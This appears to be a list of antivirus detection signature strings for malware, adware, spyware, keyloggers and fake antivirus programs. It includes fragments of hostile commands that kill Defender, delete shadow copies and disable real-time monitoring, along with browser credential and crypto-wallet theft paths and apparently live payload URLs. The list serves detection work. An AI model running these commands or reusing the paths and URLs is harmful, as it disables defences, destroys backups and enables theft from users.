- QLTV.frmMain.resources (PEHSTR_EXT)
- AppActivate "Error.TextBox1" (MACROHSTR_EXT)
- Error.TextBox1 (MACROHSTR_EXT)
- WinFormGregorCatch.exe (PEHSTR_EXT)
- MyMemoryManagement.Properties.Resources (PEHSTR_EXT)
- MyMemoryManagement.Form1.resources (PEHSTR_EXT)
- ://gigantoferkft.hu/Bajtolqrb.dat (PEHSTR_EXT)
- .ClientConn (PEHSTR_EXT)
- Mduwokd.Annotations (PEHSTR_EXT)
- Mduwokd.States (PEHSTR_EXT)
- SwitchboardServer.Properties (PEHSTR_EXT)
- Stub\Projects\Confiformsyalla\obj\Debug\Confiformsyalla.pdb (PEHSTR_EXT)
- Confiformsyalla.exe (PEHSTR_EXT)
- WeAreChmnet.pdb (PEHSTR_EXT)
- lld.eerocsm (PEHSTR_EXT)
- allstarprivate.net (PEHSTR_EXT)
- agent\main.cc (PEHSTR_EXT)
- agent\Terminal.cc (PEHSTR_EXT)
- /reverse_ssh/ (PEHSTR_EXT)
- Agent::Agent entered (PEHSTR_EXT)
- winpty_agent_process (PEHSTR_EXT)
- Stub\Projects\Jabret\obj\Debug\Jabret.pdb (PEHSTR_EXT)
- Agent.dll (PEHSTR)
- pathologist.d (PEHSTR_EXT)
- RejoiceRefReshing.resources (PEHSTR_EXT)
- QuanLyBanGiay.CCM (PEHSTR_EXT)
- ://103.74.105.78/GRANADA/Znusl.vdf (PEHSTR_EXT)
- Tehcizat.Properties (PEHSTR_EXT)
- OpenMcdf.Structs (PEHSTR_EXT)
- Lzefgtdydo.Properties.Resources.resources (PEHSTR_EXT)
- twoPnphu.Consumers (PEHSTR_EXT)
- CrudApplication.Properties.Resources (PEHSTR_EXT)
- C:\logs\RecolectorDocumentos (PEHSTR_EXT)
- TimeWindowsFormsApplication.Properties (PEHSTR_EXT)
- CryptoObfuscator_Output\HHH887.pdb (PEHSTR_EXT)
- HHH887.Properties (PEHSTR_EXT)
- 208.67.222.222 (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 (PEHSTR_EXT)
- ConBook.Properties.Resources (PEHSTR)
- &ConBook.Properties.Resources.resources (PEHSTR)
- https://inspirecollege.co.uk/trashss/ (PEHSTR_EXT)
- Product.Properties.Resources (PEHSTR_EXT)
- //167.160.166.205/1571.bin (PEHSTR_EXT)
- Memori.Properties (PEHSTR_EXT)
- Jokenpo.Properties (PEHSTR_EXT)
- xorStub.g.resources (PEHSTR_EXT)
- Devices_Custom.Properties.Resources (PEHSTR_EXT)
- soy\avicularimorphae\kmpestore (PEHSTR_EXT)
- \aandsarbejdere\fidusen (PEHSTR_EXT)
- discommodiously fondsaktiens trykstbnings (PEHSTR_EXT)
- NorthAmericaUpdate.exe (PEHSTR_EXT)
- EmployeeManagementSystem.Properties (PEHSTR_EXT)
- C:\Users\Public\Pictures\temp.tmp (PEHSTR_EXT)
- QQPCLeakScan.exe (PEHSTR_EXT)
- kwsprotect64.exe (PEHSTR_EXT)
- KvMonXP.exe (PEHSTR_EXT)
- rsdelaylauncher.exe (PEHSTR_EXT)
- PizzaOrderReceipt.Files.Def (PEHSTR_EXT)
- Client.Properties (PEHSTR_EXT)
- C24TGL_00000531.Importers (PEHSTR_EXT)
- Grafik_Sistemi.Resource1.resources (PEHSTR_EXT)
- crypto/subtle/xor.go (PEHSTR_EXT)
- syscall/syscall.go (PEHSTR_EXT)
- encoding/base64/base64.go (PEHSTR_EXT)
- .HollowProcess (PEHSTR_EXT)
- .WriteProcessMemory (PEHSTR_EXT)
- .GetRemotePebAddr (PEHSTR_EXT)
- .RedirectToPayload (PEHSTR_EXT)
- Crud3CamadasMota.Properties (PEHSTR_EXT)
- Crud3CamadasMota.Form1.resources (PEHSTR_EXT)
- Crud3CamadasMota.Properties.Resources.resources (PEHSTR_EXT)
- TextBoxMaskInput.Properties.Resources.resources (PEHSTR_EXT)
- if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title (PEHSTR_EXT)
- .replace(new RegExp( (PEHSTR_EXT)
- String.fromCharCode( (PEHSTR_EXT)
- HN.Product.resources (PEHSTR_EXT)
- Blindspot Agent (PEHSTR_EXT)
- main.BlindspotPayload (PEHSTR_EXT)
- main.RunningCampaign (PEHSTR_EXT)
- main.bindataFileInfo (PEHSTR_EXT)
- main.DecodedOutput (PEHSTR_EXT)
- main.Screenshot (PEHSTR_EXT)
- main.confFile=blindspot-agent.conf (PEHSTR_EXT)
- main.encryptedVFS=blindspot.zip (PEHSTR_EXT)
- Hadouken.Properties.Resources.resources (PEHSTR_EXT)
- //update-ledger.net/update (PEHSTR_EXT)
- UseBasicParsing -UserAgent (PEHSTR_EXT)
- ConnectFour.Kassa.NieuweKlant.resources (PEHSTR_EXT)
- lhgzkxk-1-1326101028.cos.ap-chengdu.myqcloud.com/ladhzjxa.png (PEHSTR_EXT)
- DownloadAgent (PEHSTR_EXT)
- %s\2024.png (PEHSTR_EXT)
- GB-lesson-forms.g.resource (PEHSTR_EXT)
- https://playstoremeta.com/wp-includes/Lwsgu.dat (PEHSTR_EXT)
- Fyqcteret.exe (PEHSTR_EXT)
- ResumesApp.Properties.Resources.resources (PEHSTR_EXT)
- EP1_Restaurante.Properties (PEHSTR_EXT)
- Agent: %s (PEHSTR_EXT)
- WASXZCGU77.Properties (PEHSTR_EXT)
- \Temp (PEHSTR_EXT)
- Terminating Sandcat Agent... goodbye (PEHSTR_EXT)
- BloodBank.Properties.Resources.resources (PEHSTR_EXT)
- BloodBank.Records.resources (PEHSTR_EXT)
- DetectSandBoxByDll (PEHSTR)
- Kviskoteka.Properties (PEHSTR_EXT)
- CommonPractice (PEHSTR_EXT)
- PDV.Properties.Resources.resources (PEHSTR_EXT)
- Remcos Agent initialized (PEHSTR_EXT)
- \AppData\Local\Google\Chrome\User Data\Default\Login Data (PEHSTR_EXT)
- \AppData\Local\Google\Chrome\User Data\Default\Cookies (PEHSTR_EXT)
- AppData\Roaming\Mozilla\Firefox\Profiles\ (PEHSTR_EXT)
- \logins.json (PEHSTR_EXT)
- \key3.db (PEHSTR_EXT)
- Agent initialized (PEHSTR_EXT)
- Haghazinetak.Resources (PEHSTR_EXT)
- Vfuqzohod.Properties (PEHSTR_EXT)
- ListNobifex.Resources (PEHSTR_EXT)
- Client.Helper (PEHSTR_EXT)
- ziliao.jpg (PEHSTR_EXT)
- chuangkou.log (PEHSTR_EXT)
- Bbwuxnxchu.SecurePayloadHandler+<FetchFromNetworkAsync (PEHSTR_EXT)
- Vxadisq.exe (PEHSTR_EXT)
- dynamic_code.bin (PEHSTR_EXT)
- fHOf2y0wQZxw7LSBwa.Vc3YA5bRjCBx9GKxnr (PEHSTR_EXT)
- SortArray.Properties.Resources.resources (PEHSTR_EXT)
- MacUI.Properties.Resources.resources (PEHSTR_EXT)
- 1.85 (Hash, version 2, native byte-order) (PEHSTR_EXT)
- ="http://176.65.134.79/hosting/ (MACROHSTR_EXT)
- .ps1"x2="c:\\temp\\ (MACROHSTR_EXT)
- Employee_Management_System.Properties.Resources.resources (PEHSTR_EXT)
- \programdata\Cymulate\Agent\AttacksLogs (PEHSTR_EXT)
- source\repos\windows-scenarios\Payloads\CymulateStagelessMeterpreter\x64\Release\CymulateStagelessMeterpreter.pdb (PEHSTR_EXT)
- crm.Properties.Resources.resources (PEHSTR_EXT)
- MegaDesk.Properties.Resources (PEHSTR_EXT)
- NomNom.Properties.Resources (PEHSTR_EXT)
- CommandDescriptor (PEHSTR_EXT)
- command (PEHSTR_EXT)
- escriptor (PEHSTR_EXT)
- Executor (PEHSTR_EXT)
- exe (PEHSTR_EXT)
- CommandFactory (PEHSTR_EXT)
- GetCommandBy (PEHSTR_EXT)
- ICommand (PEHSTR_EXT)
- get_Com (PEHSTR_EXT)
- set_Command (PEHSTR_EXT)
- DownloadCommand (PEHSTR_EXT)
- AddCommand (PEHSTR_EXT)
- ExeCo (PEHSTR_EXT)
- KillCommand (PEHSTR_EXT)
- TimeoutCommand (PEHSTR_EXT)
- CommandRes (PEHSTR_EXT)
- rAgent (PEHSTR_EXT)
- IsComman (PEHSTR_EXT)
- ParseCommands (PEHSTR_EXT)
- MegaDesk.Properties.Resources.resources (PEHSTR_EXT)
- GMS.Properties.Resources (PEHSTR_EXT)
- CalculadoraMediaAluno.Properties.Resources (PEHSTR_EXT)
- Student_Management_System.Properties.Resources (PEHSTR_EXT)
- project2_stockDisplay.Properties.Resources (PEHSTR_EXT)
- DeliveryMarket.Properties.Resources (PEHSTR_EXT)
- Sol_Minimarket.Properties.Resources (PEHSTR_EXT)
- Alarmer.Properties.Resources (PEHSTR_EXT)
- COFFEESHOP.Properties.Resources (PEHSTR_EXT)
- taskkill /f /im MsMpEng.exe >nul 2>&1 (PEHSTR_EXT)
- vssadmin delete shadows /all /quiet >nul 2>&1 (PEHSTR_EXT)
- powershell -command "Set-MpPreference -DisableRealtimeMonitoring $true (PEHSTR_EXT)
- shutdown /s /f /t 0 /c "Windows Update (PEHSTR_EXT)
- RSA too short). (PEHSTR_EXT)
- GET /%s HTTP/1.1 (PEHSTR_EXT)
- FinalDBMS.Properties.Resources (PEHSTR_EXT)
- System_Inspect.Properties.Resources (PEHSTR_EXT)
- Nina.Properties.Resources (PEHSTR_EXT)
- evXCrwb/ca0kO5SN3lwjbw== (PEHSTR_EXT)
- XPTcA7LGf5R6Jbesh8.jIuNk0l1PwYyv2bEFd (PEHSTR_EXT)
- https://files.catbox.moe/jty6a2.wav (PEHSTR_EXT)
- Leswvbebd.exe (PEHSTR_EXT)
- inventry.Properties.Resources (PEHSTR_EXT)
- //45.87.60.127/way/ (PEHSTR_EXT)
- //cia.tf/ (PEHSTR_EXT)
- GameFood.Properties.Resources (PEHSTR_EXT)
- StormCast.Properties.Resources (PEHSTR_EXT)
- QLNS.Properties.Resources (PEHSTR_EXT)
- Oyunu.Properties.Resources (PEHSTR_EXT)
- QuanLyHocSinh.Properties.Resources (PEHSTR_EXT)
- (serverapp.Properties.Resources.resources (PEHSTR)
- http://3.72.88.224/f1/Xluumkamo.mp4 (PEHSTR_EXT)
- CompressedBytes (PEHSTR_EXT)
- https://discord.horse/js/bw_bundle.js (PEHSTR_EXT)
- CSS_Minifier.Properties.Resources.resources (PEHSTR_EXT)
- NotepadPlus.Properties.Resources.resources (PEHSTR_EXT)
- TuoniAgent.dll (PEHSTR_EXT)
- PharmacyProject.Properties.Resources (PEHSTR_EXT)
- FirmachAgent (PEHSTR_EXT)
- AnalyzeGraphics.Properties.Resources (PEHSTR_EXT)
- SentinelAgent.exe (PEHSTR_EXT)
- SentinelServiceHost.exe (PEHSTR_EXT)
- SentinelStaticEngine.exe (PEHSTR_EXT)
- SentinelUI.exe (PEHSTR_EXT)
- SentinelHelperService.exe (PEHSTR_EXT)
- MsSense.exe (PEHSTR_EXT)
- SenseTVM.exe (PEHSTR_EXT)
- SenseNdr.exe (PEHSTR_EXT)
- SenseIR.exe (PEHSTR_EXT)
- MsMpEng.exe (PEHSTR_EXT)
- MpDefenderCoreService.exe (PEHSTR_EXT)
- NTH.Windows.Forms.Properties.Resources (PEHSTR_EXT)
- schtasks /create /f /sc onlogon /tn (PEHSTR_EXT)
- Vivaldi\User Data (PEHSTR_EXT)
- %s\Default\Web Data (PEHSTR_EXT)
- %s\Default\History (PEHSTR_EXT)
- Exodus\exodus.wallet (PEHSTR_EXT)
- Electrum\wallets (PEHSTR_EXT)
- Atomic\Local Storage\leveldb (PEHSTR_EXT)
- Coinomi\wallets (PEHSTR_EXT)
- Jaxx\Local Storage\leveldb (PEHSTR_EXT)
- Litecoin\wallets (PEHSTR_EXT)
- Bitcoin\wallets (PEHSTR_EXT)
- Dash\wallets (PEHSTR_EXT)
- Zcash\wallets (PEHSTR_EXT)
- WorldClock.Properties.Resources (PEHSTR_EXT)
- SenseCncProxy.exe (PEHSTR_EXT)
- SenseSampleUploader.exe (PEHSTR_EXT)
- MpCmdRun.exe (PEHSTR_EXT)
- MpSvc.exe (PEHSTR_EXT)
- ScreenConnect.ClientService.exe (PEHSTR_EXT)
- BdApiUtil64.sys (PEHSTR_EXT)
- ksapi64.sys (PEHSTR_EXT)
- sysmon.sys (PEHSTR_EXT)
- viragt64.sys (PEHSTR_EXT)
- WordScrambleGame.Properties.Resources (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43 (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.37 (PEHSTR_EXT)
- sYgcdvgJl/SfqIMcHzF0kj0tesjCUv5pgTjmsNcULhRKwEY7gI9t41Ag26FqEWfq (PEHSTR_EXT)
- PrimeNumberGenerator.Properties (PEHSTR_EXT)
- HastaneProjeENSONhali.Properties.Resource (PEHSTR_EXT)
- D3\$@A (PEHSTR_EXT)
- User-Agent: PowerShell (PEHSTR_EXT)
- Del /f /q "%s (PEHSTR_EXT)
- cmd.exe /C ping (PEHSTR_EXT)
- Mutex already exists, another instance is running. (PEHSTR_EXT)
- WordPressAgent (PEHSTR_EXT)
- &v@\? (SNID)
- \cnbar.ini (FILEPATH)
- \winnet.ini (FILEPATH)
- \cnbarie.dll (FILEPATH)
- \common files\toolbar\cnform.exe (FILEPATH)
- \commonname (FOLDERNAME)
- \programs\commonname (FOLDERNAME)
- Software\cnffche (REGKEY)
- software\commonname (REGKEY)
- Software\CommonName\User (REGKEY)
- SOFTWARE\CommonName\User (REGKEY)
- Software\CommonName\UserTB (REGKEY)
- SOFTWARE\CommonName\UserTB (REGKEY)
- SOFTWARE\CommonName\Toolbar (REGKEY)
- Software\Classes\babeie.helper (REGKEY)
- Software\Classes\winnet.update (REGKEY)
- software\classes\winnet.update (REGKEY)
- Software\Classes\babeie.agentie (REGKEY)
- Software\Classes\babeie.handler (REGKEY)
- Software\Classes\babie.helper.1 (REGKEY)
- Software\Classes\cnbar.bandsink (REGKEY)
- Software\Classes\gigexagent.gigexctrl (REGKEY)
- SOFTWARE\Classes\GigexAgent.GigexCtrl (REGKEY)
- Software\Classes\gigexagent.gigexctrl.1 (REGKEY)
- SOFTWARE\Classes\GigexAgent.GigexCtrl.1 (REGKEY)
- Software\Classes\vxpspeeddelivery.download (REGKEY)
- Software\Classes\vxpspeeddelivery.download.1 (REGKEY)
- http://www.look2me.com/ (PEHSTR_EXT)
- CLSID\%s\Implemented Categories\{00021492-0000-0000-C000-000000000046} (PEHSTR_EXT)
- www.ad-w-a-r-e.com (PEHSTR_EXT)
- www.a-d-w-a-r-e.com (PEHSTR_EXT)
- http://%s/AD/UCMD? (PEHSTR_EXT)
- http://%s/AD/CMD? (PEHSTR_EXT)
- ad-w-a-r-e.com (PEHSTR_EXT)
- rmvtrjan.exe (PEHSTR_EXT)
- trupd.exe (PEHSTR_EXT)
- simplysup.com (PEHSTR_EXT)
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Explorer\Streams\Desktop (PEHSTR_EXT)
- CLSID\{DDFFA75A-E81D-4454-89FC-B9FD0631E725} (PEHSTR_EXT)
- %smsg%d.dll (PEHSTR_EXT)
- www.nictechnetworks.com/eula.html By continuing to use the SOFTWARE PRODUCT after the EULA is (PEHSTR_EXT)
- ADWARE application\Core\Dev\Installer\Release\Install.pdb (PEHSTR_EXT)
- \msg1*.dll (FILEPATH)
- ,software\microsoft\internet explorer\toolbar (PEHSTR)
- /http://%s/search/search.cgi?src=autosearch&s=%s (PEHSTR)
- Software\%s (PEHSTR)
- 1.2.1 (PEHSTR)
- http://upd.lop.com/upd/check (PEHSTR_EXT)
- http://upd.zone-media.com/upd/check (PEHSTR_EXT)
- You must install this software as part of the parent program. Press OK to exit. (PEHSTR_EXT)
- \veg32.dll (FILEPATH)
- \plg_ie0.dll (FILEPATH)
- \b_dnserr.gif (FILEPATH)
- \i_dnserr.gif (FILEPATH)
- \r_dnserr.gif (FILEPATH)
- \s_dnserr.gif (FILEPATH)
- \donk_bar.dll (FILEPATH)
- \lopsearch.exe (FILEPATH)
- \frsezaeaav.dll (FILEPATH)
- \nshelstpgl.dll (FILEPATH)
- HookWatch.GetMouseMessage (PEHSTR)
- blue-series.de (PEHSTR)
- google.cn/search? (PEHSTR)
- gameyes.com (PEHSTR)
- IEHelper.dll (PEHSTR)
- ISoftware\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects (PEHSTR)
- google.com (PEHSTR)
- repl.dll (PEHSTR)
- pSoftware\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FFFFFFFF-BBBB-4146-86FD-A722E8AB3489} (PEHSTR)
- baiduba.DLL (PEHSTR_EXT)
- C:\WINDOWS\system32\ieset.ini (PEHSTR_EXT)
- www.131377.com?accect (PEHSTR_EXT)
- asiafind.com/go/g (PEHSTR_EXT)
- shop.7cv.com/index.php?asstfrom= (PEHSTR_EXT)
- cnt.zhaopin.com/Market/whole_counter.jsp?sid= (PEHSTR_EXT)
- f=http://www.netxboy.com/ (PEHSTR_EXT)
- http://go.58.com/?f= (PEHSTR_EXT)
- http://www.now.cn/?SCPMCID= (PEHSTR_EXT)
- www.joyo.com/default.asp?source=ad4all (PEHSTR_EXT)
- \.\PhysicalDrive%d (PEHSTR)
- TakeKeywordScreenshot (PEHSTR)
- AgentSettings.CaptureKeyStrokes (PEHSTR)
- 0mail.google.com (PEHSTR_EXT)
- 0/owa/auth/owaauth.dll (PEHSTR_EXT)
- 0mail.yahoo. (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\EventLog\Application\ (PEHSTR_EXT)
- AgentSettings.CaptureKeyStrokes (PEHSTR_EXT)
- TakeKeywordScreenshot (PEHSTR_EXT)
- FACEBOOK_HTTP (PEHSTR_EXT)
- MYSPACE_HTTP (PEHSTR_EXT)
- \\.\pipe\SpectorLiveLog (PEHSTR_EXT)
- \netknl.dll (FILEPATH)
- \abfrnex.dll (FILEPATH)
- \mstfgher.dll (FILEPATH)
- \msurlbot.dll (FILEPATH)
- \netknlhm.dll (FILEPATH)
- \windows\lsass.exe (PEHSTR)
- SPYAGENT@ (PEHSTR)
- SpyAgent_HWND32 (PEHSTR_EXT)
- %s\saopts.dat (PEHSTR_EXT)
- Spytech SpyAgent (PEHSTR_EXT)
- \spytech software\spyagent\spyagent.exe (FILEPATH)
- \spytech spyagent (FOLDERNAME)
- \programs\spytech spyagent (FOLDERNAME)
- \spytech software\spyagent (FOLDERNAME)
- \spytech software\spytech spyagent (FOLDERNAME)
- \spytech software\spyagent professional (FOLDERNAME)
- software\microsoft\windows\currentversion\uninstall\spytech spyagent (REGKEY)
- software\microsoft\windows\currentversion\uninstall\spytech spyagent professional (REGKEY)
- \spytech software\spytech spyagent\deploy.exe (ASEP_FILEPATH)
- \spytech software\spytech spyagent\svchost.exe (ASEP_FILEPATH)
- \spytech software\spytech spyagent\sysdiag.exe (ASEP_FILEPATH)
- \spytech software\spytech spyagent\nostealth.exe (ASEP_FILEPATH)
- \spytech software\spytech spyagent\driver-setup.exe (ASEP_FILEPATH)
- SOFTWARE\KMiNT21\PersonalDesktopSpy (REGKEY)
- \jpbkf.dll (FILEPATH)
- \vtlbar1.dll (FILEPATH)
- \cleanup2.bat (FILEPATH)
- \bundles (FOLDERNAME)
- Software\Classes\Tubby.ToolBandObj.1 (REGKEY)
- Software\Classes\clsid/{5D31B21C-2DD3-002A-8222-5E27B691B9C2} (REGKEY)
- \hpdll\hpdll.exe (ASEP_FILEPATH)
- \1aypvrv9\grip.dll (ASEP_FILEPATH)
- \09skpome\09skpome.dll (ASEP_FILEPATH)
- \1aypvrv9\1aypvrv9.dll (ASEP_FILEPATH)
- \1aypvrv9\1aypvrv9.exe (ASEP_FILEPATH)
- \1aypvrv9\61127029.exe (ASEP_FILEPATH)
- \1aypvrv9\bcd77dt3.dll (ASEP_FILEPATH)
- \u1qpdqfc\u1qpdqfc.dll (ASEP_FILEPATH)
- \common~1\wrio\wrioa.exe (ASEP_FILEPATH)
- \common~1\wrio\wriol.exe (ASEP_FILEPATH)
- \common~1\wrio\wriom.exe (ASEP_FILEPATH)
- \common~1\wrio\wriop.exe (ASEP_FILEPATH)
- \autoupdate\autoupdate.exe (ASEP_FILEPATH)
- \internet explorer\iuvitlvl.exe (ASEP_FILEPATH)
- C:\TEMP\_checktemptest (PEHSTR_EXT)
- %s\_checktemptest (PEHSTR_EXT)
- %s\Application Data\Microsoft\ (PEHSTR_EXT)
- MACHINE\Software\Classes\CLSID\{16 (PEHSTR_EXT)
- 770A0-0E87-4278-B748-2460D64A8386}\InprocServer32 (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{16 (PEHSTR_EXT)
- IEHelper%d%d%d_%s.dll (PEHSTR_EXT)
- client.yiqilai.com:1207 (PEHSTR_EXT)
- login.yiqilai.com:1207 (PEHSTR_EXT)
- request.yiqilai.com:1207 (PEHSTR_EXT)
- Software\Classes\CLSID\{16A770A0-0E87-4278-B748-2460D64A8386}\InprocServer32 (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{16A770A0-0E87-4278-B748-2460D64A8386} (PEHSTR_EXT)
- \sdastro (FOLDERNAME)
- \lljagent (FOLDERNAME)
- \microsoft\iehelper (FOLDERNAME)
- \common files\smartde (FOLDERNAME)
- Software\SDAstro (REGKEY)
- TAPI32.DLL (PEHSTR_EXT)
- StartDispatchEXEProcess (PEHSTR_EXT)
- %s PID:%d EXE:"%s" (PEHSTR_EXT)
- SOFTWARE\Casiop (PEHSTR_EXT)
- >Link Uninstall</a> (PEHSTR_EXT)
- \disinstalla.htm (PEHSTR_EXT)
- %s%i.bat (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones (PEHSTR_EXT)
- Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Trust Database\0 (PEHSTR_EXT)
- cmdline: %s, _ShowAgr=%d, _Autost=%d (PEHSTR_EXT)
- Mi sto disconnettendo... (PEHSTR_EXT)
- %s %s %d %s [T%dT].url (PEHSTR_EXT)
- Non riesco a creare la phonebook entry. (modem:%s) Errore %ld (PEHSTR_EXT)
- %s /astart (PEHSTR_EXT)
- Impossibile connettersi. Assenza di linea. Controllare che il modem sia acceso e connesso. (PEHSTR_EXT)
- Nessun Modem Rilevato. Controllare e riprovare. (PEHSTR_EXT)
- Nessun Dispositivo Rilevato o Errore. Controllare e riprovare. (PEHSTR_EXT)
- Errore nel rilascio del certificato di attivazione. Transazione abortita. Nessun addebito verra' effettuato. (PEHSTR_EXT)
- Riprova... (PEHSTR_EXT)
- C:\\sgrunt (PEHSTR_EXT)
- disinstalla.htm (PEHSTR_EXT)
- IE4321.exe (PEHSTR_EXT)
- www.sgrunt.biz/ (PEHSTR_EXT)
- \version\NvsvSys.exe (PEHSTR_EXT)
- uninstall@securize.biz (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\TTunim (PEHSTR_EXT)
- .com/index2.php (PEHSTR_EXT)
- archiviosex.com (PEHSTR_EXT)
- archiviohard.com (PEHSTR_EXT)
- c:\pass (PEHSTR_EXT)
- ows\CurrentVersion\Internet Settings\ZoneMap\Domains\ (PEHSTR_EXT)
- archiviosex.net (PEHSTR_EXT)
- sexvideopro.com (PEHSTR_EXT)
- /ccRandom/? (PEHSTR_EXT)
- /members/index2.php? (PEHSTR_EXT)
- 0\Microsoft\Internet Explorer\Quick Launch\ (PEHSTR_EXT)
- c:\Projects\SmartKeystrokeRecorder (PEHSTR)
- SmartMonitorAgent_WindowClass_ (PEHSTR)
- SmartMonitorAgent_v1_0 (PEHSTR)
- SmartKeystrokeRecorder.chm::/html/ (PEHSTR)
- skr.exe (PEHSTR)
- ,Are you sure you want to delete screenshots? (PEHSTR)
- $smartkeystrokerecorder.com/order.htm (PEHSTR)
- \smart keystroke recorder.lnk (FILEPATH)
- \smart keystroke recorder (FOLDERNAME)
- Software\Smart Keystroke Recorder (REGKEY)
- Software\microsoft\windows\currentversion\uninstall\Smart Keystroke Recorder_is1 (REGKEY)
- \sahimages (FOLDERNAME)
- software\vgroup (REGKEY)
- SOFTWARE\VGroup\SAHAgent (REGKEY)
- SOFTWARE\VGroup\SAHPopup (REGKEY)
- SOFTWARE\Classes\WEBInstaller.execute (REGKEY)
- SOFTWARE\Classes\WEBInstaller.execute.1 (REGKEY)
- software\winsock2\layered provider sample (REGKEY)
- Software\microsoft\windows\currentversion\uninstall\f3uor8hs (REGKEY)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopAtHomeSelect Agent (REGKEY)
- software\microsoft\windows\currentversion\uninstall\shopathomeselect agent (REGKEY)
- SOFTWARE\Microsoft\Code Store Database\Distribution Units\{5F3B3060-09E0-44C6-86F7-BC7B02B57BEE} (REGKEY)
- SOFTWARE\Microsoft\Code Store Database\Distribution Units\{E9670165-86FE-4C34-8C4B-D3158DDC5D92} (REGKEY)
- software\microsoft\code store database\distribution units\{30402ff4-3e71-4a1c-9b4b-1cd3486a9fb2} (REGKEY)
- L.DLL (PEHSTR)
- DllCanUnloadNow (PEHSTR)
- DllGetClassObject (PEHSTR)
- DllUnregisterServer (PEHSTR)
- ObtainUserAgentString (PEHSTR)
- +live. (PEHSTR)
- rds.yahoo. (PEHSTR)
- yahoo. (PEHSTR)
- google. (PEHSTR)
- E404.e404mgr (PEHSTR)
- e404 1.0 Type LibraryW (PEHSTR_EXT)
- e404.DLL (PEHSTR_EXT)
- Software\Classes\E404.e404mgr (REGKEY)
- Software\Classes\E404.e404mgr.1 (REGKEY)
- ?This program will download and install XP Antivirus on your PC. (PEHSTR)
- scui.cpl (PEHSTR)
- $$$$.bat (PEHSTR)
- QWProtect.DLL (PEHSTR)
- )http://winantiviruspro.net/buy.php?affid= (PEHSTR)
- $Spyware.IEMonster activity detected. (PEHSTR)
- EYour system is probably infected with version of Spyware.IEMonster.b. (PEHSTR)
- ://scanreporting.com (PEHSTR)
- www.WinDesktopDefender.com/ (PEHSTR)
- /httpss/setup.php? (PEHSTR)
- This program will download and install Antivirus 2009 on your PC. (PEHSTR)
- \AVInstaller (PEHSTR)
- JavaScript (PEHSTR)
- IEDefender.DLL (PEHSTR)
- /index.php?id= (PEHSTR)
- /presale/2/index.php?id= (PEHSTR)
- /blocked.php?id= (PEHSTR)
- /cnt.jpg (PEHSTR_EXT)
- %s\%c%c%c%c%c.%s (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion (PEHSTR_EXT)
- http://85 (PEHSTR_EXT)
- InitializeSecurityDescriptor (PEHSTR_EXT)
- HttpOpenRequestA (PEHSTR_EXT)
- HttpAddRequestHeadersA (PEHSTR_EXT)
- http://213. (PEHSTR_EXT)
- /dladv (PEHSTR_EXT)
- .php?code1= (PEHSTR_EXT)
- tool.exe (PEHSTR_EXT)
- tool.txt (PEHSTR_EXT)
- tibs.php (PEHSTR_EXT)
- tibs.exe (PEHSTR_EXT)
- IIt may be possible to skip this check using the /NCRC command line switch (PEHSTR)
- del /F /Q imex.bat (PEHSTR)
- User-Agent: (PEHSTR)
- Connecting ... (PEHSTR)
- /NOTICE TO USER: THIS END USER LICENSE AGREEMENT (PEHSTR)
- User-Agent: ITDialer (PEHSTR_EXT)
- EngineAP.dll (PEHSTR)
- \Release\SSEngine.pdb (PEHSTR)
- AntivirusPro\SSEngine\Release (PEHSTR)
- d_REGBACKUP.sbk (PEHSTR)
- Engine.dat file does not exist (PEHSTR)
- Software\AntivirusPro (PEHSTR)
- antivirus-pro-site.com (PEHSTR)
- C:\SSEngine.dll (PEHSTR)
- !Repair process has been completed (PEHSTR)
- RAdwarePro\NewEngine\Rebrands\AntivirusDoktor\Bin\release\Antivirus Doktor 2009.pdb (PEHSTR)
- Software\AntivirusDoktorNE (PEHSTR)
- AntiMalware_Pro.exe (PEHSTR)
- AntiMalware_Pro.pdb (PEHSTR)
- //join1.php (PEHSTR)
- latestversion/123.exe (PEHSTR)
- latestversion/AntiMalwarePro.exe (PEHSTR_EXT)
- Anti-Virus-Pro.install (PEHSTR_EXT)
- Anti-Virus-Pro successfully instaled. (PEHSTR_EXT)
- EngineAP.dll (PEHSTR_EXT)
- Engine failed to load. Error:%d (PEHSTR_EXT)
- \Antivirus XP 2008 (PEHSTR)
- Mutex.dll (PEHSTR)
- MachineKey.dll (PEHSTR)
- \VirusIsolator\ (PEHSTR)
- \Antivirus XP (PEHSTR_EXT)
- delself.bat (PEHSTR_EXT)
- partypoker.com (PEHSTR_EXT)
- mediafire.com (PEHSTR_EXT)
- adultfriendfinder.com (PEHSTR_EXT)
- skyrock.com (PEHSTR_EXT)
- \database.dat (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved (PEHSTR_EXT)
- /buy2/ (PEHSTR_EXT)
- /purchase2/ (PEHSTR_EXT)
- \pin.vbs " (PEHSTR_EXT)
- database.dat (PEHSTR_EXT)
- OLEACC.dll (PEHSTR_EXT)
